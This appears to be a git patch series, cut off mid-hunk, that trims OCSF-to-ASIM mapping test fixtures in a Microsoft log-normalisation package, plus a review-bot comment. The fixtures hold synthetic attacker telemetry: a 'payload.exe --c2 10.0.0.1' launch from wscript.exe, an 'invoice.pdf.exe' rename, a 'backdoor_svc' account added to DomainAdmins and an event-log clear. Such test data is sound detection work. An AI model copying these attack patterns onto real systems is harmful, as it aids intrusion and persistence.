@@ -25,63 +25,5 @@ AlertStatus: "Active", AlertOriginalStatus: "New", AlertVerdict: "True Positive", - AdditionalFields: { - activity_id: 1, - activity_name: "Create", - attacks: [ - { - technique: { - uid: "T1059", - }, - }, - ], - category_uid: 2, - category_name: "Findings", - class_uid: 2004, - class_name: "Detection Finding", - type_uid: 200401, - type_name: "Detection Finding: Create", - time: 2026-05-01T10:10:00Z, - end_time: 2026-05-01T10:12:00Z, - severity_id: 4, - severity: "High", - status_id: 1, - status: "New", - verdict: "True Positive", - metadata: { - log_name: "security/alerts_v2", - original_event_uid: "alert-1", - product: { - name: "Microsoft Defender", - vendor_name: "Microsoft", - feature: { - name: "Microsoft Graph", - }, - }, - profiles: [ - "cloud", - "incident", - "security_control", - ], - tenant_uid: "11111111-1111-1111-1111-111111111111", - version: "1.8.0", - }, - cloud: { - provider: "Azure", - }, - finding_info: { - uid: "alert-1", - title: "Suspicious PowerShell", - desc: "PowerShell launched with suspicious arguments.", - types: [ - "malware", - ], - }, - malware: [ - { - name: "Trojan", - }, - ], - }, name: "asim.alert_event", } diff --git a/microsoft/tests/asim/ocsf/dhcp_activity.txt b/microsoft/tests/asim/ocsf/dhcp_activity.txt index 180e62e..4cc2b13 100644 --- a/microsoft/tests/asim/ocsf/dhcp_activity.txt +++ b/microsoft/tests/asim/ocsf/dhcp_activity.txt 
@@ -18,32 +18,5 @@ SrcHostname: "client1", SrcIpAddr: 10.0.0.50, SrcMacAddr: "00:11:22:33:44:55", - AdditionalFields: { - activity_id: 5, - activity_name: "Ack", - category_uid: 4, - class_uid: 4004, - class_name: "DHCP Activity", - type_uid: 400405, - time: 2026-01-01T00:00:03Z, - severity_id: 1, - status: "Success", - metadata: { - original_event_uid: "dhcp-1", - product: { - name: "DHCP", - vendor_name: "Microsoft", - }, - version: "1.8.0", - }, - device: { - hostname: "dhcp1", - }, - src_endpoint: { - hostname: "client1", - ip: 10.0.0.50, - mac: "00:11:22:33:44:55", - }, - }, name: "asim.dhcp_event", } diff --git a/microsoft/tests/asim/ocsf/dns_activity.txt b/microsoft/tests/asim/ocsf/dns_activity.txt index 6d4567a..63ed92b 100644 --- a/microsoft/tests/asim/ocsf/dns_activity.txt +++ b/microsoft/tests/asim/ocsf/dns_activity.txt @@ -24,36 +24,5 @@ SrcHostname: null, DstIpAddr: null, DstHostname: null, - AdditionalFields: { - activity_id: 1, - activity_name: "Query", - category_uid: 4, - class_uid: 4003, - class_name: "DNS Activity", - type_uid: 400301, - time: 2026-01-01T00:00:02Z, - severity_id: 1, - status: "Success", - rcode: "NA", - metadata: { - original_event_uid: "dns-1", - product: { - name: "DNS", - vendor_name: "Microsoft", - }, - version: "1.8.0", - }, - device: { - hostname: "dns1", - }, - query: { - hostname: "example.org", - type: "A", - class: "IN", - }, - src_endpoint: { - ip: 10.0.0.1, - }, - }, name: "asim.dns", } diff --git a/microsoft/tests/asim/ocsf/event_log_activity.txt b/microsoft/tests/asim/ocsf/event_log_activity.txt index 2e3fde0..d9429a1 100644 --- a/microsoft/tests/asim/ocsf/event_log_activity.txt +++ b/microsoft/tests/asim/ocsf/event_log_activity.txt 
@@ -25,47 +25,5 @@ SrcIpAddr: null, TargetHostname: null, TargetIpAddr: null, - AdditionalFields: { - activity_id: 1, - activity_name: "Clear", - category_uid: 1, - category_name: "System Activity", - class_uid: 1008, - class_name: "Event Log Activity", - type_uid: 100801, - type_name: "Event Log Activity: Clear", - time: 2024-03-23T12:34:56.789012300Z, - severity_id: 4, - severity: "High", - metadata: { - event_code: "1102", - log_name: "Security", - original_event_uid: "99001", - product: { - name: "Microsoft-Windows-Eventlog", - vendor_name: "Microsoft", - }, - profiles: [ - "host", - ], - version: "1.8.0", - }, - device: { - hostname: "WINHOST01.corp.local", - }, - actor: { - process: { - pid: 4660, - }, - session: { - uid_alt: "0xA1B2C3", - }, - user: { - domain: "CORP", - name: "jdoe", - uid: "S-1-5-21-3107921522-2185401913-891411500-1104", - }, - }, - }, name: "asim.audit_event", } diff --git a/microsoft/tests/asim/ocsf/file_system_activity.txt b/microsoft/tests/asim/ocsf/file_system_activity.txt index cf45713..2ff1ae7 100644 --- a/microsoft/tests/asim/ocsf/file_system_activity.txt +++ b/microsoft/tests/asim/ocsf/file_system_activity.txt @@ -20,37 +20,6 @@ TargetFilePath: "C:\\tmp\\payload.exe", TargetFileName: "payload.exe", TargetFilePathType: "Windows Local", - AdditionalFields: { - activity_id: 1, - activity_name: "Create", - category_uid: 1, - class_uid: 1001, - class_name: "File System Activity", - type_uid: 100101, - time: 2026-01-01T00:00:00Z, - severity_id: 1, - status: "Success", - metadata: { - original_event_uid: "file-1", - product: { - name: "Endpoint", - vendor_name: "Microsoft", - }, - version: "1.8.0", - }, - device: { - hostname: "host1", - }, - actor: { - user: { - name: "alice", - }, - }, - file: { - path: "C:\\tmp\\payload.exe", - name: "payload.exe", - }, - }, name: "asim.file_event", } { 
@@ -78,40 +47,5 @@ SrcFileName: "payload.exe", SrcFilePathType: "Windows Local", TargetFilePathType: "Windows Local", - AdditionalFields: { - activity_id: 5, - activity_name: "Rename", - category_uid: 1, - class_uid: 1001, - class_name: "File System Activity", - type_uid: 100105, - time: 2026-01-01T00:00:05Z, - severity_id: 1, - status: "Success", - metadata: { - original_event_uid: "file-2", - product: { - name: "Endpoint", - vendor_name: "Microsoft", - }, - version: "1.8.0", - }, - device: { - hostname: "host1", - }, - actor: { - user: { - name: "alice", - }, - }, - file: { - path: "C:\\tmp\\payload.exe", - name: "payload.exe", - }, - file_result: { - path: "C:\\tmp\\invoice.pdf.exe", - name: "invoice.pdf.exe", - }, - }, name: "asim.file_event", } diff --git a/microsoft/tests/asim/ocsf/group_management.txt b/microsoft/tests/asim/ocsf/group_management.txt index 7f01855..2777d0d 100644 --- a/microsoft/tests/asim/ocsf/group_management.txt +++ b/microsoft/tests/asim/ocsf/group_management.txt 
@@ -27,48 +27,5 @@ GroupIdType: "SID", SrcIpAddr: null, SrcHostname: null, - AdditionalFields: { - activity_id: 3, - activity_name: "Add User", - category_uid: 3, - category_name: "Identity & Access Management", - class_uid: 3006, - class_name: "Group Management", - type_uid: 300603, - type_name: "Group Management: Add User", - time: 2024-03-23T12:34:57Z, - severity_id: 1, - metadata: { - event_code: "4728", - original_event_uid: "98776", - product: { - name: "Microsoft-Windows-Security-Auditing", - vendor_name: "Microsoft", - }, - profiles: [ - "host", - ], - version: "1.8.0", - }, - device: { - hostname: "DC01.corp.local", - }, - actor: { - user: { - domain: "CORP", - name: "jdoe", - uid: "S-1-5-21-3107921522-2185401913-891411500-1104", - }, - }, - group: { - domain: "CORP", - name: "DomainAdmins", - uid: "S-1-5-21-3107921522-2185401913-891411500-512", - }, - user: { - name: "CN=backdoor_svc,CN=Users,DC=corp,DC=local", - uid: "S-1-5-21-3107921522-2185401913-891411500-1500", - }, - }, name: "asim.user_management", } diff --git a/microsoft/tests/asim/ocsf/http_activity.txt b/microsoft/tests/asim/ocsf/http_activity.txt index cd66053..3cd81cb 100644 --- a/microsoft/tests/asim/ocsf/http_activity.txt +++ b/microsoft/tests/asim/ocsf/http_activity.txt @@ -18,36 +18,5 @@ Url: "https://example.org/index.html", HttpRequestMethod: "GET", EventResultDetails: "200", - AdditionalFields: { - activity_id: 3, - activity_name: "Get", - category_uid: 4, - class_uid: 4002, - class_name: "HTTP Activity", - type_uid: 400203, - time: 2026-01-01T00:00:04Z, - severity_id: 1, - status: "Success", - metadata: { - original_event_uid: "web-1", - product: { - name: "Proxy", - vendor_name: "Microsoft", - }, - version: "1.8.0", - }, - device: { - hostname: "proxy1", - }, - http_request: { - http_method: "GET", - url: { - url_string: "https://example.org/index.html", - }, - }, - http_response: { - code: 200, - }, - }, name: "asim.web_session", } 
diff --git a/microsoft/tests/asim/ocsf/network_activity.txt b/microsoft/tests/asim/ocsf/network_activity.txt index 005e7cb..d712463 100644 --- a/microsoft/tests/asim/ocsf/network_activity.txt +++ b/microsoft/tests/asim/ocsf/network_activity.txt @@ -23,39 +23,5 @@ DstPortNumber: 443, SrcBytes: 100, DstBytes: 200, - AdditionalFields: { - activity_id: 6, - activity_name: "Traffic", - category_uid: 4, - class_uid: 4001, - class_name: "Network Activity", - type_uid: 400106, - time: 2026-01-01T00:00:01Z, - severity_id: 1, - status: "Success", - metadata: { - original_event_uid: "net-1", - product: { - name: "Firewall", - vendor_name: "Microsoft", - }, - version: "1.8.0", - }, - device: { - hostname: "fw1", - }, - src_endpoint: { - ip: 10.0.0.1, - port: 12345, - }, - dst_endpoint: { - ip: 10.0.0.2, - port: 443, - }, - traffic: { - bytes_out: 100, - bytes_in: 200, - }, - }, name: "asim.network_session", } diff --git a/microsoft/tests/asim/ocsf/process_activity.txt b/microsoft/tests/asim/ocsf/process_activity.txt index 392d9ef..2261a94 100644 --- a/microsoft/tests/asim/ocsf/process_activity.txt +++ b/microsoft/tests/asim/ocsf/process_activity.txt 
@@ -25,63 +25,5 @@ TargetProcessName: "payload.exe", TargetProcessCommandLine: "payload.exe --c2 10.0.0.1", TargetUserId: null, - AdditionalFields: { - activity_id: 1, - activity_name: "Launch", - category_uid: 1, - category_name: "System Activity", - class_uid: 1007, - class_name: "Process Activity", - type_uid: 100701, - type_name: "Process Activity: Launch", - time: 2024-03-23T12:34:56.789012300Z, - severity_id: 1, - severity: "Informational", - status_id: 1, - status: "Success", - metadata: { - event_code: "4688", - original_event_uid: "98764", - product: { - name: "Microsoft-Windows-Security-Auditing", - vendor_name: "Microsoft", - }, - profiles: [ - "host", - ], - version: "1.8.0", - }, - device: { - hostname: "WINHOST01.corp.local", - }, - actor: { - process: { - pid: 4660, - name: "wscript.exe", - parent_process: { - pid: 520, - name: "explorer.exe", - }, - }, - session: { - uid_alt: "0xA1B2C3", - }, - user: { - domain: "CORP", - name: "jdoe", - uid: "S-1-5-21-3107921522-2185401913-891411500-1104", - }, - }, - process: { - pid: 6732, - name: "payload.exe", - path: "C:\\tmp\\payload.exe", - cmd_line: "payload.exe --c2 10.0.0.1", - parent_process: { - pid: 4660, - name: "wscript.exe", - }, - }, - }, name: "asim.process_event", } diff --git a/microsoft/tests/asim/windows.tql b/microsoft/tests/asim/windows.tql index c1069a4..db04bbc 100644 --- a/microsoft/tests/asim/windows.tql +++ b/microsoft/tests/asim/windows.tql @@ -10,4 +10,3 @@ ocsf::derive ocsf::cast microsoft::asim::map event=this name = @name -drop AdditionalFields.metadata.processed_time? diff --git a/microsoft/tests/asim/windows.txt b/microsoft/tests/asim/windows.txt index 6f7df95..2962cf9 100644 --- a/microsoft/tests/asim/windows.txt +++ b/microsoft/tests/asim/windows.txt 
@@ -35,104 +35,5 @@ TargetAppId: null, TargetAppName: null, LogonProtocol: "Kerberos", - AdditionalFields: { - activity_id: 1, - activity_name: "Logon", - actor: { - session: { - uid_alt: "0x0", - }, - user: { - domain: null, - name: null, - uid: "S-1-0-0", - }, - }, - auth_protocol: "Kerberos", - auth_protocol_id: 2, - category_name: "Identity & Access Management", - category_uid: 3, - class_name: "Authentication", - class_uid: 3002, - device: { - hostname: "DC01.corp.local", - }, - logon_type: "Network", - logon_type_id: 3, - metadata: { - event_code: "4624", - extensions: [ - { - name: "win", - }, - ], - log_format: "xml", - log_level: "0", - log_name: "Security", - log_version: "2", - logged_time: 2024-03-23T12:34:56.789012300Z, - original_event_uid: "98761", - product: { - name: "Microsoft-Windows-Security-Auditing", - uid: "{5770385F-C994-4D63-B9EC-B6FE73E0CE8A}", - vendor_name: "Microsoft", - }, - profiles: [ - "host", - ], - version: "1.8.0", - }, - raw_data: "\n \n \n 4624\n 2\n 0\n 12544\n 0x8020000000000000\n \n 98761\n \n \n Security\n DC01.corp.local\n \n \n S-1-0-0\n -\n -\n 0x0\n S-1-5-21-3107921522-2185401913-891411500-1104\n jdoe\n CORP\n 0xA1B2C3\n 3\n Kerberos\n Kerberos\n -\n {B4C8A1F2-3D9E-4A12-8B7C-1F2E3D4A5B6C}\n -\n -\n 0\n 0x0\n -\n 10.0.0.42\n 49827\n %%1833\n -\n -\n -\n %%1843\n 0x0\n %%1842\n \n\n", - raw_data_size: 1918, - session: { - uid: "{B4C8A1F2-3D9E-4A12-8B7C-1F2E3D4A5B6C}", - uid_alt: "0xA1B2C3", - }, - severity: "Informational", - severity_id: 1, - src_endpoint: { - hostname: null, - ip: 10.0.0.42, - port: 49827, - }, - status: "Success", - status_id: 1, - time: 2024-03-23T12:34:56.789012300Z, - type_name: "Authentication: Logon", - type_uid: 300201, - unmapped: { - System: { - Task: 12544, - Keywords: "0x8020000000000000", - Correlation: { - ActivityID: "{abc123-def456}", - }, - Execution: { - ProcessID: 4, - ThreadID: 72, - }, - }, - EventData: { - LogonProcessName: "Kerberos", - TransmittedServices: null, - LmPackageName: 
null,
- KeyLength: 0,
- ProcessId: "0x0",
- ProcessName: null,
- ImpersonationLevel: "%%1833",
- RestrictedAdminMode: null,
- TargetOutboundUserName: null,
- TargetOutboundDomainName: null,
- VirtualAccount: "%%1843",
- TargetLinkedLogonId: "0x0",
- ElevatedToken: "%%1842",
- },
- },
- user: {
- domain: "CORP",
- name: "jdoe",
- uid: "S-1-5-21-3107921522-2185401913-891411500-1104",
- },
- },
 name: "asim.authentication",
 }
From 4f926aec8c3cd8a604bf42ac4387fee4e67a675e Mon Sep 17 00:00:00 2001
From: Matthias Vallentin
Date: Thu, 11 Jun 2026 18:44:43 +0200
Subject: [PATCH 24/27] Trim ASIM OCSF test fixtures
Remove redundant class filters from per-schema ASIM OCSF tests. Keep only the records each fixture intends to map, and drop single-event sorts that no longer affect output order.
Assisted-by: GPT-5 (Codex)
---
 microsoft/tests/asim/ocsf/account_change.tql | 42 -----
 microsoft/tests/asim/ocsf/dhcp_activity.tql | 158 ------------------
 microsoft/tests/asim/ocsf/dns_activity.tql | 154 -----------------
 .../tests/asim/ocsf/file_system_activity.tql | 120 -------------
 .../tests/asim/ocsf/group_management.tql | 38 -----
 microsoft/tests/asim/ocsf/http_activity.tql | 154 -----------------
 .../tests/asim/ocsf/network_activity.tql | 151 -----------------
 7 files changed, 817 deletions(-)
diff --git a/microsoft/tests/asim/ocsf/account_change.tql b/microsoft/tests/asim/ocsf/account_change.tql
index 370e3fb..a99e0f5 100644
--- a/microsoft/tests/asim/ocsf/account_change.tql
+++ b/microsoft/tests/asim/ocsf/account_change.tql
@@ -34,49 +34,7 @@ from { name: "backdoor_svc", uid: "S-1-5-21-3107921522-2185401913-891411500-1500", }, -}, { - activity_id: 3, - activity_name: "Add User", - category_uid: 3, - category_name: "Identity & Access Management", - class_uid: 3006, - class_name: "Group Management", - type_uid: 300603, - type_name: "Group Management: Add User", - time: 2024-03-23T12:34:57Z, - severity_id: 1, - metadata: { - event_code: "4728", - original_event_uid: "98776", - product: { - name: "Microsoft-Windows-Security-Auditing", - vendor_name: "Microsoft", - }, - profiles: ["host"], - version: "1.8.0", - }, - device: { - hostname: "DC01.corp.local", - }, - actor: { - user: { - domain: "CORP", - name: "jdoe", - uid: "S-1-5-21-3107921522-2185401913-891411500-1104", - }, - }, - group: { - domain: "CORP", - name: "DomainAdmins", - uid: "S-1-5-21-3107921522-2185401913-891411500-512", - }, - user: { - name: "CN=backdoor_svc,CN=Users,DC=corp,DC=local", - uid: "S-1-5-21-3107921522-2185401913-891411500-1500", - }, } @name = "ocsf.account_change" -where class_uid == 3001 microsoft::asim::ocsf::map event=this name = @name -sort EventOriginalType diff --git a/microsoft/tests/asim/ocsf/dhcp_activity.tql b/microsoft/tests/asim/ocsf/dhcp_activity.tql index ffb274f..afaba70 100644 --- a/microsoft/tests/asim/ocsf/dhcp_activity.tql +++ b/microsoft/tests/asim/ocsf/dhcp_activity.tql 
@@ -1,131 +1,4 @@ from { - activity_id: 1, - activity_name: "Create", - category_uid: 1, - class_uid: 1001, - class_name: "File System Activity", - type_uid: 100101, - time: 2026-01-01T00:00:00Z, - severity_id: 1, - status: "Success", - metadata: { - original_event_uid: "file-1", - product: { - name: "Endpoint", - vendor_name: "Microsoft", - }, - version: "1.8.0", - }, - device: { - hostname: "host1", - }, - actor: { - user: { - name: "alice", - }, - }, - file: { - path: "C:\\tmp\\payload.exe", - name: "payload.exe", - }, -}, { - activity_id: 5, - activity_name: "Rename", - category_uid: 1, - class_uid: 1001, - class_name: "File System Activity", - type_uid: 100105, - time: 2026-01-01T00:00:05Z, - severity_id: 1, - status: "Success", - metadata: { - original_event_uid: "file-2", - product: { - name: "Endpoint", - vendor_name: "Microsoft", - }, - version: "1.8.0", - }, - device: { - hostname: "host1", - }, - actor: { - user: { - name: "alice", - }, - }, - file: { - path: "C:\\tmp\\payload.exe", - name: "payload.exe", - }, - file_result: { - path: "C:\\tmp\\invoice.pdf.exe", - name: "invoice.pdf.exe", - }, -}, { - activity_id: 6, - activity_name: "Traffic", - category_uid: 4, - class_uid: 4001, - class_name: "Network Activity", - type_uid: 400106, - time: 2026-01-01T00:00:01Z, - severity_id: 1, - status: "Success", - metadata: { - original_event_uid: "net-1", - product: { - name: "Firewall", - vendor_name: "Microsoft", - }, - version: "1.8.0", - }, - device: { - hostname: "fw1", - }, - src_endpoint: { - ip: 10.0.0.1, - port: 12345, - }, - dst_endpoint: { - ip: 10.0.0.2, - port: 443, - }, - traffic: { - bytes_out: 100, - bytes_in: 200, - }, -}, { - activity_id: 1, - activity_name: "Query", - category_uid: 4, - class_uid: 4003, - class_name: "DNS Activity", - type_uid: 400301, - time: 2026-01-01T00:00:02Z, - severity_id: 1, - status: "Success", - rcode: "NA", - metadata: { - original_event_uid: "dns-1", - product: { - name: "DNS", - vendor_name: "Microsoft", - }, - 
version: "1.8.0", - }, - device: { - hostname: "dns1", - }, - query: { - hostname: "example.org", - type: "A", - class: "IN", - }, - src_endpoint: { - ip: 10.0.0.1, - }, -}, { activity_id: 5, activity_name: "Ack", category_uid: 4, @@ -151,38 +24,7 @@ from { ip: 10.0.0.50, mac: "00:11:22:33:44:55", }, -}, { - activity_id: 3, - activity_name: "Get", - category_uid: 4, - class_uid: 4002, - class_name: "HTTP Activity", - type_uid: 400203, - time: 2026-01-01T00:00:04Z, - severity_id: 1, - status: "Success", - metadata: { - original_event_uid: "web-1", - product: { - name: "Proxy", - vendor_name: "Microsoft", - }, - version: "1.8.0", - }, - device: { - hostname: "proxy1", - }, - http_request: { - http_method: "GET", - url: { - url_string: "https://example.org/index.html", - }, - }, - http_response: { - code: 200, - }, } -where class_uid == 4004 microsoft::asim::ocsf::map event=this name = @name sort EventOriginalUid diff --git a/microsoft/tests/asim/ocsf/dns_activity.tql b/microsoft/tests/asim/ocsf/dns_activity.tql index 327881f..f601bc8 100644 --- a/microsoft/tests/asim/ocsf/dns_activity.tql +++ b/microsoft/tests/asim/ocsf/dns_activity.tql 
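Review bot: `sort EventOriginalUid` survives as the last line of dhcp_activity.tql (and again at the end of the dns_activity.tql hunk below) although the commit message says single-event sorts were dropped and account_change.tql does drop its `sort EventOriginalType`; after these removals each fixture appears to hold a single record, so the sort is dead weight and the three fixtures are now inconsistent with one another. Either remove the line here and in dns_activity.tql, or keep a sort in every fixture so that adding a second record later cannot silently change the expected output order. The `from { … }` literal that this hunk trims starts before the hunk.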
@@ -1,101 +1,4 @@ from { - activity_id: 1, - activity_name: "Create", - category_uid: 1, - class_uid: 1001, - class_name: "File System Activity", - type_uid: 100101, - time: 2026-01-01T00:00:00Z, - severity_id: 1, - status: "Success", - metadata: { - original_event_uid: "file-1", - product: { - name: "Endpoint", - vendor_name: "Microsoft", - }, - version: "1.8.0", - }, - device: { - hostname: "host1", - }, - actor: { - user: { - name: "alice", - }, - }, - file: { - path: "C:\\tmp\\payload.exe", - name: "payload.exe", - }, -}, { - activity_id: 5, - activity_name: "Rename", - category_uid: 1, - class_uid: 1001, - class_name: "File System Activity", - type_uid: 100105, - time: 2026-01-01T00:00:05Z, - severity_id: 1, - status: "Success", - metadata: { - original_event_uid: "file-2", - product: { - name: "Endpoint", - vendor_name: "Microsoft", - }, - version: "1.8.0", - }, - device: { - hostname: "host1", - }, - actor: { - user: { - name: "alice", - }, - }, - file: { - path: "C:\\tmp\\payload.exe", - name: "payload.exe", - }, - file_result: { - path: "C:\\tmp\\invoice.pdf.exe", - name: "invoice.pdf.exe", - }, -}, { - activity_id: 6, - activity_name: "Traffic", - category_uid: 4, - class_uid: 4001, - class_name: "Network Activity", - type_uid: 400106, - time: 2026-01-01T00:00:01Z, - severity_id: 1, - status: "Success", - metadata: { - original_event_uid: "net-1", - product: { - name: "Firewall", - vendor_name: "Microsoft", - }, - version: "1.8.0", - }, - device: { - hostname: "fw1", - }, - src_endpoint: { - ip: 10.0.0.1, - port: 12345, - }, - dst_endpoint: { - ip: 10.0.0.2, - port: 443, - }, - traffic: { - bytes_out: 100, - bytes_in: 200, - }, -}, { activity_id: 1, activity_name: "Query", category_uid: 4, 
@@ -125,64 +28,7 @@ from { src_endpoint: { ip: 10.0.0.1, }, -}, { - activity_id: 5, - activity_name: "Ack", - category_uid: 4, - class_uid: 4004, - class_name: "DHCP Activity", - type_uid: 400405, - time: 2026-01-01T00:00:03Z, - severity_id: 1, - status: "Success", - metadata: { - original_event_uid: "dhcp-1", - product: { - name: "DHCP", - vendor_name: "Microsoft", - }, - version: "1.8.0", - }, - device: { - hostname: "dhcp1", - }, - src_endpoint: { - hostname: "client1", - ip: 10.0.0.50, - mac: "00:11:22:33:44:55", - }, -}, { - activity_id: 3, - activity_name: "Get", - category_uid: 4, - class_uid: 4002, - class_name: "HTTP Activity", - type_uid: 400203, - time: 2026-01-01T00:00:04Z, - severity_id: 1, - status: "Success", - metadata: { - original_event_uid: "web-1", - product: { - name: "Proxy", - vendor_name: "Microsoft", - }, - version: "1.8.0", - }, - device: { - hostname: "proxy1", - }, - http_request: { - http_method: "GET", - url: { - url_string: "https://example.org/index.html", - }, - }, - http_response: { - code: 200, - }, } -where class_uid == 4003 microsoft::asim::ocsf::map event=this name = @name sort EventOriginalUid diff --git a/microsoft/tests/asim/ocsf/file_system_activity.tql b/microsoft/tests/asim/ocsf/file_system_activity.tql index f1792ec..ef53ca8 100644 --- a/microsoft/tests/asim/ocsf/file_system_activity.tql +++ b/microsoft/tests/asim/ocsf/file_system_activity.tql 
@@ -62,127 +62,7 @@ from {
 path: "C:\\tmp\\invoice.pdf.exe",
 name: "invoice.pdf.exe",
 },
-}, {
- activity_id: 6,
- activity_name: "Traffic",
- category_uid: 4,
- class_uid: 4001,
- class_name: "Network Activity",
- type_uid: 400106,
- time: 2026-01-01T00:00:01Z,
- severity_id: 1,
- status: "Success",
- metadata: {
- original_event_uid: "net-1",
- product: {
- name: "Firewall",
- vendor_name: "Microsoft",
- },
- version: "1.8.0",
- },
- device: {
- hostname: "fw1",
- },
- src_endpoint: {
- ip: 10.0.0.1,
- port: 12345,
- },
- dst_endpoint: {
- ip: 10.0.0.2,
- port: 443,
- },
- traffic: {
- bytes_out: 100,
- bytes_in: 200,
- },
-}, {
- activity_id: 1,
- activity_name: "Query",
- category_uid: 4,
- class_uid: 4003,
- class_name: "DNS Activity",
- type_uid: 400301,
- time: 2026-01-01T00:00:02Z,
- severity_id: 1,
- status: "Success",
- rcode: "NA",
- metadata: {
- original_event_uid: "dns-1",
- product: {
- name: "DNS",
- vendor_name: "Microsoft",
- },
- version: "1.8.0",
- },
- device: {
- hostname: "dns1",
- },
- query: {
- hostname: "example.org",
- type: "A",
- class: "IN",
- },
- src_endpoint: {
- ip: 10.0.0.1,
- },
-}, {
- activity_id: 5,
- activity_name: "Ack",
- category_uid: 4,
- class_uid: 4004,
- class_name: "DHCP Activity",
- type_uid: 400405,
- time: 2026-01-01T00:00:03Z,
- severity_id: 1,
- status: "Success",
- metadata: {
- original_event_uid: "dhcp-1",
- product: {
- name: "DHCP",
- vendor_name: "Microsoft",
- },
- version: "1.8.0",
- },
- device: {
- hostname: "dhcp1",
- },
- src_endpoint: {
- hostname: "client1",
- ip: 10.0.0.50,
- mac: "00:11:22:33:44:55",
- },
-}, {
- activity_id: 3,
- activity_name: "Get",
- category_uid: 4,
- class_uid: 4002,
- class_name: "HTTP Activity",
- type_uid: 400203,
- time: 2026-01-01T00:00:04Z,
- severity_id: 1,
- status: "Success",
- metadata: {
- original_event_uid: "web-1",
- product: {
- name: "Proxy",
- vendor_name: "Microsoft",
- },
- version: "1.8.0",
- },
- device: {
- hostname: "proxy1",
- },
- http_request: {
http_method: "GET",
- url: {
- url_string: "https://example.org/index.html",
- },
- },
- http_response: {
- code: 200,
- },
 }
-where class_uid == 1001
 microsoft::asim::ocsf::map event=this
 name = @name
 sort EventOriginalUid
diff --git a/microsoft/tests/asim/ocsf/group_management.tql b/microsoft/tests/asim/ocsf/group_management.tql
index a3adc02..b9df034 100644
--- a/microsoft/tests/asim/ocsf/group_management.tql
+++ b/microsoft/tests/asim/ocsf/group_management.tql
@@ -1,40 +1,4 @@ from {
- activity_id: 1,
- activity_name: "Create",
- category_uid: 3,
- category_name: "Identity & Access Management",
- class_uid: 3001,
- class_name: "Account Change",
- type_uid: 300101,
- type_name: "Account Change: Create",
- time: 2024-03-23T12:34:56.789012300Z,
- severity_id: 1,
- metadata: {
- event_code: "4720",
- original_event_uid: "98767",
- product: {
- name: "Microsoft-Windows-Security-Auditing",
- vendor_name: "Microsoft",
- },
- profiles: ["host"],
- version: "1.8.0",
- },
- device: {
- hostname: "DC01.corp.local",
- },
- actor: {
- user: {
- domain: "CORP",
- name: "jdoe",
- uid: "S-1-5-21-3107921522-2185401913-891411500-1104",
- },
- },
- user: {
- domain: "CORP",
- name: "backdoor_svc",
- uid: "S-1-5-21-3107921522-2185401913-891411500-1500",
- },
-}, {
 activity_id: 3,
 activity_name: "Add User",
 category_uid: 3,
@@ -76,7 +40,5 @@ from {
 },
 }
 @name = "ocsf.group_management"
-where class_uid == 3006
 microsoft::asim::ocsf::map event=this
 name = @name
-sort EventOriginalType
diff --git a/microsoft/tests/asim/ocsf/http_activity.tql b/microsoft/tests/asim/ocsf/http_activity.tql
index a6e0fab..93c2bac 100644
--- a/microsoft/tests/asim/ocsf/http_activity.tql
+++ b/microsoft/tests/asim/ocsf/http_activity.tql
@@ -1,157 +1,4 @@ from {
- activity_id: 1,
- activity_name: "Create",
- category_uid: 1,
- class_uid: 1001,
- class_name: "File System Activity",
- type_uid: 100101,
- time: 2026-01-01T00:00:00Z,
- severity_id: 1,
- status: "Success",
- metadata: {
- original_event_uid: "file-1",
- product: {
- name: "Endpoint",
- vendor_name: "Microsoft",
- },
- version: "1.8.0",
- },
- device: {
- hostname: "host1",
- },
- actor: {
- user: {
- name: "alice",
- },
- },
- file: {
- path: "C:\\tmp\\payload.exe",
- name: "payload.exe",
- },
-}, {
- activity_id: 5,
- activity_name: "Rename",
- category_uid: 1,
- class_uid: 1001,
- class_name: "File System Activity",
- type_uid: 100105,
- time: 2026-01-01T00:00:05Z,
- severity_id: 1,
- status: "Success",
- metadata: {
- original_event_uid: "file-2",
- product: {
- name: "Endpoint",
- vendor_name: "Microsoft",
- },
- version: "1.8.0",
- },
- device: {
- hostname: "host1",
- },
- actor: {
- user: {
- name: "alice",
- },
- },
- file: {
- path: "C:\\tmp\\payload.exe",
- name: "payload.exe",
- },
- file_result: {
- path: "C:\\tmp\\invoice.pdf.exe",
- name: "invoice.pdf.exe",
- },
-}, {
- activity_id: 6,
- activity_name: "Traffic",
- category_uid: 4,
- class_uid: 4001,
- class_name: "Network Activity",
- type_uid: 400106,
- time: 2026-01-01T00:00:01Z,
- severity_id: 1,
- status: "Success",
- metadata: {
- original_event_uid: "net-1",
- product: {
- name: "Firewall",
- vendor_name: "Microsoft",
- },
- version: "1.8.0",
- },
- device: {
- hostname: "fw1",
- },
- src_endpoint: {
- ip: 10.0.0.1,
- port: 12345,
- },
- dst_endpoint: {
- ip: 10.0.0.2,
- port: 443,
- },
- traffic: {
- bytes_out: 100,
- bytes_in: 200,
- },
-}, {
- activity_id: 1,
- activity_name: "Query",
- category_uid: 4,
- class_uid: 4003,
- class_name: "DNS Activity",
- type_uid: 400301,
- time: 2026-01-01T00:00:02Z,
- severity_id: 1,
- status: "Success",
- rcode: "NA",
- metadata: {
- original_event_uid: "dns-1",
- product: {
- name: "DNS",
- vendor_name: "Microsoft",
- },
- version: "1.8.0",
- },
- device: {
- hostname: "dns1",
- },
- query: {
- hostname: "example.org",
- type: "A",
- class: "IN",
- },
- src_endpoint: {
- ip: 10.0.0.1,
- },
-}, {
- activity_id: 5,
- activity_name: "Ack",
- category_uid: 4,
- class_uid: 4004,
- class_name: "DHCP Activity",
- type_uid: 400405,
- time: 2026-01-01T00:00:03Z,
- severity_id: 1,
- status: "Success",
- metadata: {
- original_event_uid: "dhcp-1",
- product: {
- name: "DHCP",
- vendor_name: "Microsoft",
- },
- version: "1.8.0",
- },
- device: {
- hostname: "dhcp1",
- },
- src_endpoint: {
- hostname: "client1",
- ip: 10.0.0.50,
- mac: "00:11:22:33:44:55",
- },
-}, {
 activity_id: 3,
 activity_name: "Get",
 category_uid: 4,
@@ -182,7 +29,6 @@ from {
 code: 200,
 },
 }
-where class_uid == 4002
 microsoft::asim::ocsf::map event=this
 name = @name
 sort EventOriginalUid
diff --git a/microsoft/tests/asim/ocsf/network_activity.tql b/microsoft/tests/asim/ocsf/network_activity.tql
index e590998..455919e 100644
--- a/microsoft/tests/asim/ocsf/network_activity.tql
+++ b/microsoft/tests/asim/ocsf/network_activity.tql
@@ -1,68 +1,4 @@ from {
- activity_id: 1,
- activity_name: "Create",
- category_uid: 1,
- class_uid: 1001,
- class_name: "File System Activity",
- type_uid: 100101,
- time: 2026-01-01T00:00:00Z,
- severity_id: 1,
- status: "Success",
- metadata: {
- original_event_uid: "file-1",
- product: {
- name: "Endpoint",
